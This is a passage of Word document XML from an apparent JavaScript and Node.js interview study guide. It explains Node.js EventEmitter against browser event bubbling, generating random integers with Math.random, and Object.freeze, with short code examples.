        <w:t>Event Handling in Node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64219E4C" w14:textId="77777777" w:rsidR="00BC73BC" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC73BC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>While event bubbling is a browser-specific concept, Node.js also has an event-driven architecture, particularly in modules like events and frameworks like Express.js. Node.js events, however, do not have a DOM, so event bubbling as it occurs in the browser doesn't apply.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C2B055" w14:textId="77777777" w:rsidR="00BC73BC" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC73BC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In Node.js, you work with the EventEmitter class to handle events. Here's an example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C0E777"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EventEmitter = require('events');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477C8BD5"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eventEmitter = new EventEmitter();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100D4EC9"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99437C7"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Register an event listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762CC76C"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eventEmitter.on('greet', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEB7D49"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console.log('Hello world!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B322786"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E22F686"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E587162"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Emit the event</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32029C70" w14:textId="77777777" w:rsidR="00BC73BC" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC73B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eventEmitter.emit('greet');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29383461" w14:textId="77777777" w:rsidR="00BC73BC" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC73BC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In Node.js, there is no concept of event propagation or bubbling because there is no hierarchical structure like the DOM. Each event is self-contained and does not automatically propagate to other event listeners.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3E2FD9" w14:textId="77777777" w:rsidR="00BC73BC" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC73BC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Differences Between Browser and Node.js Event Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BE8408" w14:textId="77777777" w:rsidR="00BC73BC" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC73BC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Event Bubbling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDBE579" w14:textId="77777777" w:rsidR="00BC73BC" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC73BC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="238"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Browser</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Events bubble up through the DOM hierarchy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FF2023" w14:textId="77777777" w:rsidR="00BC73BC" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC73BC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="238"/>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No bubbling mechanism because there is no DOM; events are isolated to the EventEmitter instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538095A3" w14:textId="77777777" w:rsidR="00BC73BC" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC73BC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Event Targeting</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F96D87" w14:textId="77777777" w:rsidR="00BC73BC" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC73BC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="238"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Browser</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Events target specific elements in the DOM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EB8952" w14:textId="77777777" w:rsidR="00BC73BC" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC73BC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="238"/>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Events are triggered on instances of EventEmitter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFFC7E2" w14:textId="77777777" w:rsidR="00BC73BC" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC73BC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Propagation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA412AD" w14:textId="77777777" w:rsidR="00BC73BC" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC73BC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="238"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Browser</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: You can stop event propagation with stopPropagation().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676D4E10" w14:textId="77777777" w:rsidR="00BC73BC" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC73BC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="238"/>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Propagation is not a concept since events do not bubble.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414C0D9C" w14:textId="77777777" w:rsidR="005A3D24" w:rsidRPr="00DA2F32" w:rsidRDefault="005A3D24" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CE3184B" w14:textId="4196085D" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc178383256"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How do you generate random integers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w14:paraId="643D6C49" w14:textId="77777777" w:rsidR="001F1CED" w:rsidRPr="00DA2F32" w:rsidRDefault="001F1CE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getRandomInt(min, max) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23701A84" w14:textId="77777777" w:rsidR="001F1CED" w:rsidRPr="00DA2F32" w:rsidRDefault="001F1CE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min = Math.ceil(min); // Round up to the nearest integer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB6064F" w14:textId="77777777" w:rsidR="001F1CED" w:rsidRPr="00DA2F32" w:rsidRDefault="001F1CE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max = Math.floor(max); // Round down to the nearest integer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481CBBB2" w14:textId="77777777" w:rsidR="001F1CED" w:rsidRPr="00DA2F32" w:rsidRDefault="001F1CE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Math.floor(Math.random() * (max - min + 1)) + min;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115981F2" w14:textId="77777777" w:rsidR="001F1CED" w:rsidRPr="00DA2F32" w:rsidRDefault="001F1CE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1DAD211" w14:textId="77777777" w:rsidR="001F1CED" w:rsidRPr="00DA2F32" w:rsidRDefault="001F1CE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2B9B603" w14:textId="77777777" w:rsidR="001F1CED" w:rsidRPr="00DA2F32" w:rsidRDefault="001F1CE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Example usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2955CE32" w14:textId="198850C8" w:rsidR="005A3D24" w:rsidRPr="00DA2F32" w:rsidRDefault="001F1CE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lastRenderedPageBreak/>
        <w:t>console.log(getRandomInt(1, 10)); // Random integer between 1 and 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CE87B4" w14:textId="786AC4BD" w:rsidR="007F0334" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc178383257"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is the purpose of freeze method</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w14:paraId="7DEAB08A" w14:textId="77777777" w:rsidR="00412E5C" w:rsidRPr="00DA2F32" w:rsidRDefault="00412E5C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In Node.js (as well as in standard JavaScript), the Object.freeze() method is used to make an object immutable. Once an object is frozen, you cannot modify its properties or add new properties. This method is part of ECMAScript 5 (ES5) and is available in JavaScript environments, including Node.js.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F838FA7" w14:textId="77777777" w:rsidR="00412E5C" w:rsidRPr="00DA2F32" w:rsidRDefault="00412E5C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Object.freeze() Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652AB456" w14:textId="77777777" w:rsidR="00412E5C" w:rsidRPr="00DA2F32" w:rsidRDefault="00412E5C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The Object.freeze() method prevents modifications to an object. It makes the object itself and its properties read-only. Here are some key points about Object.freeze():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325529B3" w14:textId="77777777" w:rsidR="00412E5C" w:rsidRPr="00DA2F32" w:rsidRDefault="00412E5C" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="239"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Immutability</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The object cannot be altered. This means you can't add, remove, or modify properties of the object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082D856F" w14:textId="77777777" w:rsidR="00412E5C" w:rsidRPr="00DA2F32" w:rsidRDefault="00412E5C" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="239"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Shallow Freezing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The Object.freeze() method performs a shallow freeze. This means that it only applies to the properties of the object itself and not to nested objects. To freeze nested objects, you would need to recursively freeze each object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556498CA" w14:textId="77777777" w:rsidR="00412E5C" w:rsidRPr="00DA2F32" w:rsidRDefault="00412E5C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AD0FB0"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highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Object.freeze(obj);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773FA50E" w14:textId="77777777" w:rsidR="00412E5C" w:rsidRPr="00DA2F32" w:rsidRDefault="00412E5C" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>obj</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The object to be frozen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAC0D49" w14:textId="77777777" w:rsidR="00412E5C" w:rsidRPr="00DA2F32" w:rsidRDefault="00412E5C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C4310D"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person = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9A7213"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'John',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66171F24"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30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20128990"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23418DB"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3AA3E3C"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Freeze the object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552251E0"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Object.freeze(person);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ABD332"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AD1F050"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Attempt to modify the object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FD3462"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person.age = 31; // This will not work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CF6F3E"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person.gender = 'male'; // This will not work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEB569E"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delete person.name; // This will not work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2566D4F9"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5052BBF"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console.log(person); // { name: 'John', age: 30 }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626C2FAD" w14:textId="77777777" w:rsidR="00412E5C" w:rsidRPr="00DA2F32" w:rsidRDefault="00412E5C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In this example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6DF243" w14:textId="77777777" w:rsidR="00412E5C" w:rsidRPr="00DA2F32" w:rsidRDefault="00412E5C" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="241"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Attempting to change the age property or add a new gender property will have no effect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F3DC30" w14:textId="77777777" w:rsidR="00412E5C" w:rsidRPr="00DA2F32" w:rsidRDefault="00412E5C" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="241"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The person object remains unchanged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D531459" w14:textId="77777777" w:rsidR="00412E5C" w:rsidRPr="00DA2F32" w:rsidRDefault="00412E5C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Checking Freezability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27407E5D" w14:textId="77777777" w:rsidR="00412E5C" w:rsidRPr="00DA2F32" w:rsidRDefault="00412E5C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
